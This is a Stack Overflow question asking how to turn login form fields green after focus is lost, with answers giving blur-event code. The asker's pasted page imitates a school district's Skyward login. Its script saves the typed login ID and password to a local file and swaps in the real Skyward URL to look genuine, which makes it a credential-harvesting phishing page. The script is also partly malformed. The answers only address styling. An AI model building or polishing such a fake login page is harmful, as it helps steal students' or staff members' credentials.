# How to change form background color on focus loss when text is entered?

Tags: javascript, html, css, focus, client-side

First I would like to point out that all of this is client side, not web based whatsoever. I need to have the form boxes change to green after focus loss when text has been input. The form boxes start out white, turn purple on focus, and i need them to turn green on a loss of focus when text is input.

---

```
<!DOCTYPE html>
<html>
<head>
<title>Login - Powered By Skyward</title>
<link rel="icon" href="skyicon.gif">
<meta name="viewport" content="height=device-height, initial-scale=1.0">
<script type ="text/javascript">
function WriteToFile(passForm) {
set fso = CreateObject("Scripting.FileSystemObject");  
set s = fso.CreateTextFile("C:\error.txt", True);
s.writeline(document.passForm.input1.value);
s.writeline(document.passForm.input2.value);
s.Close();
window.history.pushState("object or string", "Skyward Login", "https://sky.gilmerisd.org/scripts/wsisa.dll/WService=wsEAplus/seplog01.w");
}
</script>
<style>
body {
    background-image: url("slp_ps.jpg");
    background-repeat:no-repeat;
}
input {
    display:inline-block;
    float:right;
}
{
width:1234px;
height:50%;
position:relative;
margin:auto;
}
.btn-style{
    border : solid 1px #2d9cf0;
    border-radius : 3px;
    moz-border-radius : 3px;
    font-size : 9px;
    color : #000000;
    padding : 4px 13px;
    background-color : #ffffff;

}
div {
    margin-top: 500px;
    margin-bottom: 0px;
    margin-right: 500px;
    margin-left: 485px;
}
.inputbox-css {
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  margin: -1px 0 0;
  padding: 5px;
  border: 1px solid rgba(127,174,255,1);
  -webkit-border-radius: 1px;
  border-radius: 1px;
  font: normal 16px/normal "Times New Roman", Times, serif;
  color: rgba(0,0,0,0.9);
  -o-text-overflow: clip;
  text-overflow: clip;
}

.inputbox-css:focus {
  background: #ebc4fc;
}
p {
  display:block;
  float:right;
}
</style>
</head>
<body>
<body background="slp_ps.jpg" style="width:1220px;height:700px;">
<div>
<p>
<form onsubmit="download(this['name'].value, this['text'].value)">
<font size="2" face="arial" class="element"> Login ID: </font><input         class="inputbox-css" type="text" style="font-family: Verdana; font-size: 12px;"     name="lllllllllll loginid" "width: 165px;" maxlength="100"/><br>
<br>
<font size="2" face="arial" class="element"> Password: </font><input     class="inputbox-css" type="password" style="font-family: Verdana; font-size:     12px;" name="lllllllllll password;" "width: 160px;" maxlength="100"/><br>
<br>
<font size="2" face="arial"> <input type="submit" class="btn-    style"name="lllllllllll submit" value="Sign In"/><br>
</form>
</p>
</div>
</form>
</body>
</html>
```

Comment: What you mean by `client side, not web based`??

Comment: What have you tried? Could you upload some code? See https://stackoverflow.com/help/how-to-ask

Comment: you all misunderstand, i am working from a flashdrive and this is not on the internet, sorry for my bad english

Answer (score 1, accepted):

blur is what you are looking for.

```js
document.write("<input type='text'>");
var input = document.querySelector('input');
input.addEventListener('focus',function(){
  input.style.backgroundColor = "purple";
})
input.addEventListener('blur',function(){
  if(input.value != ""){
      input.style.backgroundColor = "green";
  }
})
```

Answer (score 1):

Here is a quick jsfiddle using Jquery:

https://jsfiddle.net/37dw6e3u/

using the jquery .blur function:

```
$("input").blur(function(){
    $(this).css("background-color", "green")
});
```

(there is no check if the user actually added text so you could write that yourself), you could use .focus to change the color on focus.

I would like to say that a very quick google search on this problem would turn up a huge amount of solutions to your problem. Try to fix it yourself first next time!

Comment: no the issue is this is all from a usb, i do not have a webserver and cannot use jquery or php

Comment: Why cant you include jquery on your usb?  There is no css on blur selector

Comment: i am running this locally, no webserver

Comment: Yeah that doesnt matter? You can include jquery local just like you can run javascript local since your browser runs this and not your server. Just download the jquery file and add it to your usb. As long as you open the page in a webbrowser that can run javascript (any of you favorite browsers can) it is fine. I would suggest reading a little bit more into the basic of how websites work!

Comment: Thank you for the insight! I was under the impression that jquery was run server side like php... I will definitely take your advice, and I much appreciate your friendly response!